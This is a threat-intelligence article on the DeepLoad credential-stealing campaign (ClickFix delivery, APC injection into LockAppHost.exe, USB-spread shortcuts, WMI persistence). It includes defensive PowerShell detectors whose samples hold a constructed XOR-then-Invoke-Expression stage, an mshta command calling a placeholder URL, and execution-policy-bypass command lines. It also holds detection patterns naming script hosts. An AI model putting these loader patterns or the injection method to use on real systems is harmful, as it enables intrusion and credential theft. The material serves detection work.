DeepLoad Malware: AI-Generated Evasion Meets ClickFix Delivery in Enterprise Credential Theft Campaign

A new malware campaign dubbed “DeepLoad” is targeting enterprise environments, combining ClickFix social-engineering delivery with AI-generated obfuscation that evades signature- and file-based controls. ReliaQuest researchers identified the threat after observing it gain persistent, credential-stealing access from a single user action.

What Makes DeepLoad Different

DeepLoad isn’t notable for any single technique; what stands out is an entire attack chain engineered to defeat the controls most organizations rely on. The malware arrives via ClickFix, a social-engineering technique in which the victim is shown a fake browser prompt or a phishing page with realistic “error” messaging and is walked through copying a command and running it themselves. The initial execution is therefore a user-launched process, not an exploit or a downloaded file that mail and web gateways could have inspected.

Once the user pastes the command, mshta.exe (a signed Microsoft binary, so the launch looks legitimate to application allowlisting) retrieves an obfuscated PowerShell loader from attacker infrastructure. The staging domains observed across incidents began serving malicious content within 22 minutes of registration, which puts security teams that rely on manual triage, or on domain age and reputation lists, at a significant disadvantage.

AI-Generated Obfuscation Defeats Static Scanning

DeepLoad’s PowerShell loader buries its real logic under thousands of meaningless variable assignments that resemble routine scripting. The functional code is minimal: a short XOR routine that decodes an in-memory shellcode container using a hardcoded key. The decoded payload is never written to disk, so file-based security tools have nothing to scan; only the padded loader text and the process behaviour that follows are observable.

The sheer volume of padding is one reason ReliaQuest assesses with high confidence that AI was used to build this obfuscation layer. Whether the generator is a language model or a script, the operational consequence is the same: padding is cheap to regenerate, so organizations should expect frequent malware updates and less time to adapt detection coverage between waves. Detections that key on the shape of the padding (hundreds of assignments that are never read, followed by an XOR loop) are more durable than signatures on any one variant.
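The padding pattern described above can be measured rather than eyeballed. The following is an added example (not DeepLoad's loader and not ReliaQuest's tooling) that uses PowerShell's own parser to count assignments whose variables are never read, plus the XOR-then-Invoke-Expression stage. The sample script at the bottom is constructed for the demo and is only parsed, never executed; the flag thresholds are an assumption to tune against your own fleet. Save it as a .ps1 and run it.

```powershell
# Added example, not DeepLoad's loader: score a PowerShell script for the
# "assignment padding" pattern using PowerShell's own parser. The sample
# script at the bottom is constructed for the demo and is only parsed,
# never executed.
using namespace System.Management.Automation.Language

function Get-PaddingReport {
    param([Parameter(Mandatory)][string]$ScriptText)

    $tokens = $null; $errors = $null
    $ast = [Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)

    # Every "$x = ..." statement, and the variable names they write
    $assignments = @($ast.FindAll({ param($n) $n -is [AssignmentStatementAst] }, $true))
    $written = @{}
    foreach ($a in $assignments) {
        if ($a.Left -is [VariableExpressionAst]) { $written[$a.Left.VariablePath.UserPath] = $true }
    }

    # Variable names that are read anywhere (the left side of "=" is a write, not a read)
    $read = @{}
    foreach ($v in @($ast.FindAll({ param($n) $n -is [VariableExpressionAst] }, $true))) {
        $isWrite = ($v.Parent -is [AssignmentStatementAst]) -and [object]::ReferenceEquals($v.Parent.Left, $v)
        if (-not $isWrite) { $read[$v.VariablePath.UserPath] = $true }
    }
    $dead = @($written.Keys | Where-Object { -not $read.ContainsKey($_) })

    # The stage that does the work: XOR operators and Invoke-Expression calls
    $xorOps  = @($tokens | Where-Object { $_.Text -ieq '-bxor' }).Count
    $invokes = @($ast.FindAll({ param($n)
        $n -is [CommandAst] -and $n.GetCommandName() -match '^(iex|Invoke-Expression)$' }, $true)).Count

    $ratio = if ($assignments.Count) { [math]::Round($dead.Count / $assignments.Count, 2) } else { 0 }
    [pscustomobject]@{
        Assignments      = $assignments.Count
        DeadVariables    = $dead.Count
        DeadRatio        = $ratio
        XorOperators     = $xorOps
        InvokeExpression = $invokes
        PaddingFlag      = ($dead.Count -ge 100 -and $ratio -ge 0.9)   # thresholds are an assumption; tune per fleet
        DecodeAndRunFlag = ($xorOps -gt 0 -and $invokes -gt 0)
    }
}

# Constructed sample: 300 never-read assignments wrapped around a four-line XOR-then-run stage
$stage = @'
$key = 0x5A
$blob = 0x3B,0x2F,0x2E,0x7A
$out = foreach ($b in $blob) { $b -bxor $key }
iex ([System.Text.Encoding]::ASCII.GetString([byte[]]$out))
'@
$padding = (1..300 | ForEach-Object { "`$cfg$_ = $_ * 2" }) -join "`n"

Get-PaddingReport -ScriptText $stage                        # stage alone: XOR + iex, no padding
Get-PaddingReport -ScriptText ($padding + "`n" + $stage)    # padded: DeadRatio about 0.99, both flags set
```

Run it over the ScriptBlockText of 4104 events rather than over files: the loader is pulled by mshta.exe and executed without ever being saved, so the log is the only place the padded text reliably turns up.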

Hiding Inside Windows Lock Screen

After initial access, DeepLoad injects its payload into LockAppHost.exe, the legitimate Windows process that hosts the lock screen. The choice looks deliberate: LockAppHost.exe does not normally initiate outbound network activity, so few detection rules are written to monitor it. That cuts both ways for defenders. Nothing watches the process by default, but any outbound connection from it is anomalous, which makes it a high-fidelity detection once it is added to the rule set.

The malware uses APC (Asynchronous Procedure Call) injection to get there: it launches the target process in a suspended state, writes shellcode into the new process's memory, and queues an APC pointing at the shellcode on the suspended primary thread with QueueUserAPC. When the thread is resumed, the queued APC runs during thread start-up, before the process's own entry point. Because no remote thread is created, telemetry keyed on CreateRemoteThread (Sysmon Event ID 8, for example) does not fire; process lineage and network activity are the signals that remain.
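The two stages described so far, the mshta.exe to PowerShell hand-off and the LockAppHost.exe injection, leave behavioural traces even though nothing touches disk. The block below is an added example of detection logic for those traces; it is not from the ReliaQuest report. The event objects are constructed to look like Sysmon Event 1 (process create) and Event 3 (network connect) records after their EventData fields have been mapped to properties. The assumption that a healthy LockAppHost.exe is started by svchost.exe is mine and should be checked against your own baseline before it becomes an alert.

```powershell
# Added example, not from the ReliaQuest report: detection logic for the
# mshta -> PowerShell loader stage and the LockAppHost.exe injection. The
# records below are constructed to resemble Sysmon Event 1 and Event 3 data;
# in production, map Get-WinEvent output from Microsoft-Windows-Sysmon/Operational
# into the same property names and pipe it through Find-DeepLoadSignal.

function New-Finding($Record, [string]$Reason) {
    [pscustomobject]@{ Host = $Record.Host; Id = $Record.Id; Image = $Record.Image; Reason = $Reason }
}

function Find-DeepLoadSignal {
    param([Parameter(ValueFromPipeline)]$Record)
    process {
        $image  = [IO.Path]::GetFileName([string]$Record.Image).ToLowerInvariant()
        $parent = [IO.Path]::GetFileName([string]$Record.ParentImage).ToLowerInvariant()
        $cmd    = [string]$Record.CommandLine
        switch ($Record.Id) {
            1 {
                # ClickFix stage: the user-pasted command runs mshta.exe against a remote URL
                if ($image -eq 'mshta.exe' -and $cmd -match '(?i)https?://') {
                    New-Finding $Record 'mshta.exe launched with a remote URL'
                }
                # Loader stage: PowerShell under mshta.exe, or with the execution policy bypassed
                if ($image -in 'powershell.exe','pwsh.exe') {
                    if ($parent -eq 'mshta.exe') { New-Finding $Record 'PowerShell spawned by mshta.exe' }
                    if ($cmd -match '(?i)-(ep|exec|executionpolicy)\s+bypass') { New-Finding $Record 'PowerShell with execution policy bypass' }
                }
                # Assumption: on a healthy host LockAppHost.exe is started by svchost.exe; verify against your baseline
                if ($image -eq 'lockapphost.exe' -and $parent -ne 'svchost.exe') {
                    New-Finding $Record "LockAppHost.exe started by unexpected parent '$parent'"
                }
            }
            3 {
                # Outbound connections from LockAppHost.exe are anomalous; mshta.exe connections mark the HTA fetch
                if ($image -in 'lockapphost.exe','mshta.exe') {
                    New-Finding $Record "$image connected to $($Record.DestinationIp):$($Record.DestinationPort)"
                }
            }
        }
    }
}

# Constructed sample records (paths, hostnames and the 203.0.113.0/24 address are placeholders, not indicators)
$lockApp = 'C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockAppHost.exe'
$psExe   = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$records = @(
    [pscustomobject]@{ Id=1; Host='WS01'; Image='C:\Windows\System32\mshta.exe'; ParentImage='C:\Windows\explorer.exe'; CommandLine='mshta https://verify.example.invalid/v' }
    [pscustomobject]@{ Id=1; Host='WS01'; Image=$psExe; ParentImage='C:\Windows\System32\mshta.exe'; CommandLine='powershell -ep bypass -w hidden -c ...' }
    [pscustomobject]@{ Id=1; Host='WS01'; Image=$lockApp; ParentImage=$psExe; CommandLine='LockAppHost.exe' }
    [pscustomobject]@{ Id=3; Host='WS01'; Image=$lockApp; DestinationIp='203.0.113.10'; DestinationPort=443 }
    # Benign controls: a normal LockAppHost start and an ordinary browser launch produce no findings
    [pscustomobject]@{ Id=1; Host='WS02'; Image=$lockApp; ParentImage='C:\Windows\System32\svchost.exe'; CommandLine='LockAppHost.exe' }
    [pscustomobject]@{ Id=1; Host='WS02'; Image='C:\Program Files\Google\Chrome\Application\chrome.exe'; ParentImage='C:\Windows\explorer.exe'; CommandLine='chrome.exe' }
)
$records | Find-DeepLoadSignal | Format-Table -AutoSize    # five findings, all on WS01
```

Make sure the Sysmon configuration actually records Event 3 for LockAppHost.exe; many baseline configurations exclude system-app binaries from network logging, and the rule above is only as good as the telemetry behind it.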

Credential Theft Starts Immediately

DeepLoad steals credentials from the moment it lands. A standalone credential stealer named filemanager.exe is delivered from, and reports to, separate infrastructure, so it can keep exfiltrating data even if the main loader and its command-and-control are detected and blocked. The name appears intentional: it reads like a harmless system utility.

The campaign also deploys a malicious browser extension that captures credentials as users type them, persisting across every browser session until explicitly removed. This creates two compounding credential-theft paths:

  • Stored credential scraping — pulling saved browser passwords directly
  • Live interception — capturing active logins, open tabs, and session tokens in real time; a stolen session token remains valid after a password change until the session itself is revoked

USB Spread Extends the Blast Radius

Within ten minutes of initial infection, researchers observed USB activity tracked separately in the C2 backend. When a USB drive was connected to an infected host:

  • Over 40 files were written to the drive in a single operation
  • Files were disguised as familiar installers: ChromeSetup.lnk, Firefox Installer.lnk, AnyDesk.lnk
  • Each shortcut file can retrigger the full infection on double-click

Defenders should treat all removable media connected to affected hosts as potentially compromised. The artifact to look for is a shortcut named like an installer whose target resolves to a script host or command interpreter rather than to an installer binary.
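Checking removable media for the shortcuts described above is a matter of resolving each .lnk file's target and arguments. The block below is an added example of that triage, not something from the ReliaQuest report; the list of script hosts it flags is my own, and the "USB drive" it scans is a temp folder holding two constructed shortcuts, so the check runs without a real device. The disguised shortcut points at powershell.exe with a harmless Get-Date command as a stand-in for the real loader command.

```powershell
# Added example, not from the ReliaQuest report: triage .lnk files on removable
# media by resolving each shortcut's target and arguments and flagging anything
# that points at a script host or LOLBin. The sample drive is a temp folder with
# two constructed shortcuts so the check runs without a real USB device.

function Get-SuspiciousShortcut {
    param([Parameter(Mandatory)][string[]]$Path)
    $shell = New-Object -ComObject WScript.Shell
    # Targets a genuine installer shortcut should never resolve to (list is an assumption; extend as needed)
    $scriptHosts = 'mshta.exe','powershell.exe','pwsh.exe','cmd.exe','wscript.exe','cscript.exe','rundll32.exe','regsvr32.exe'
    foreach ($lnk in Get-ChildItem -Path $Path -Filter *.lnk -File -Recurse -ErrorAction SilentlyContinue) {
        $sc      = $shell.CreateShortcut($lnk.FullName)
        $target  = [IO.Path]::GetFileName([string]$sc.TargetPath).ToLowerInvariant()
        $argText = [string]$sc.Arguments
        $reason  = $null
        if ($target -in $scriptHosts) { $reason = "target is $target" }
        elseif ($argText -match '(?i)(mshta|powershell|iex|invoke-expression|https?://)') { $reason = 'script host or URL in arguments' }
        if ($reason) {
            [pscustomobject]@{ Shortcut = $lnk.FullName; Target = $sc.TargetPath; Arguments = $argText; Reason = $reason }
        }
    }
}

# Real use: every removable drive currently attached (Win32_LogicalDisk DriveType 2 = removable)
# Get-CimInstance Win32_LogicalDisk -Filter 'DriveType = 2' | ForEach-Object { Get-SuspiciousShortcut -Path "$($_.DeviceID)\" }

# Constructed sample drive: one shortcut disguised as an installer, one benign
$drive = Join-Path $env:TEMP ('usb_' + [guid]::NewGuid())
New-Item -ItemType Directory -Path $drive | Out-Null
$shell = New-Object -ComObject WScript.Shell
$bad = $shell.CreateShortcut((Join-Path $drive 'ChromeSetup.lnk'))
$bad.TargetPath   = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
$bad.Arguments    = '-NoProfile -WindowStyle Hidden -Command Get-Date'   # harmless stand-in for a loader command
$bad.IconLocation = "$env:SystemRoot\System32\shell32.dll,0"              # borrowed icon, as the real shortcuts would use
$bad.Save()
$ok = $shell.CreateShortcut((Join-Path $drive 'Notes.lnk'))
$ok.TargetPath = "$env:SystemRoot\System32\notepad.exe"
$ok.Save()

Get-SuspiciousShortcut -Path $drive | Format-List    # reports ChromeSetup.lnk only
Remove-Item -Recurse -Force $drive
```

Resolving shortcuts through WScript.Shell does not execute them, but do the triage on an analysis host rather than on the infected one, and keep autorun and Explorer previews out of the picture by mounting the media read-only where the hardware allows it.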

Hidden WMI Persistence Survives Cleanup

Standard endpoint cleanup isn’t enough. DeepLoad used a Windows Management Instrumentation (WMI) event subscription to reinfect a “clean” host three days later with no user action required.

Permanent WMI event subscriptions are stored in the WMI repository (the OBJECTS.DATA store under %SystemRoot%\System32\wbem\Repository), not as a script or executable that file-based scanning would flag, and most cleanup workflows never look there. A subscription is three objects: an __EventFilter (the WQL trigger condition), a consumer such as CommandLineEventConsumer or ActiveScriptEventConsumer (what runs), and a __FilterToConsumerBinding tying them together. In ReliaQuest’s investigation, the surviving subscription fired and dropped filemanager.exe back into the user’s Downloads folder after the host had passed routine cleanup.

Defense Recommendations

  • Add WMI subscription auditing to remediation checklists: enumerate the __EventFilter, consumer, and __FilterToConsumerBinding objects in root\subscription and remove suspicious ones before returning hosts to production
  • Enable PowerShell Script Block Logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational). It records script blocks as PowerShell compiles them, including the de-obfuscated stages a loader hands to Invoke-Expression, so the logic under the padding is logged. It does not capture the decoded shellcode, which never becomes PowerShell code, so pair it with process and network telemetry
  • Monitor for mshta.exe making outbound connections or spawning PowerShell, PowerShell launched with -ExecutionPolicy Bypass, newly created scheduled tasks, and LockAppHost.exe with an unexpected parent or any network activity
  • Rotate ALL credentials from affected hosts (saved passwords, session tokens, and any accounts active during the infection window) and revoke active sessions, since a stolen session token survives a password change
  • Audit browser extensions and remove any installed outside standard deployment paths

Why This Matters

DeepLoad demonstrates that newly surfaced threats can arrive operationally mature. The combination of AI-assisted obfuscation, fileless execution, multiple credential theft vectors, USB propagation, and hidden persistence creates a threat that requires behavioral detection—not file-based scanning—to catch early.

As AI makes new variants cheaper to produce, expect the obfuscation to evolve from generic noise to padding tailored to specific environments, making behavioral baselining harder over time.

Source: ReliaQuest Threat Spotlight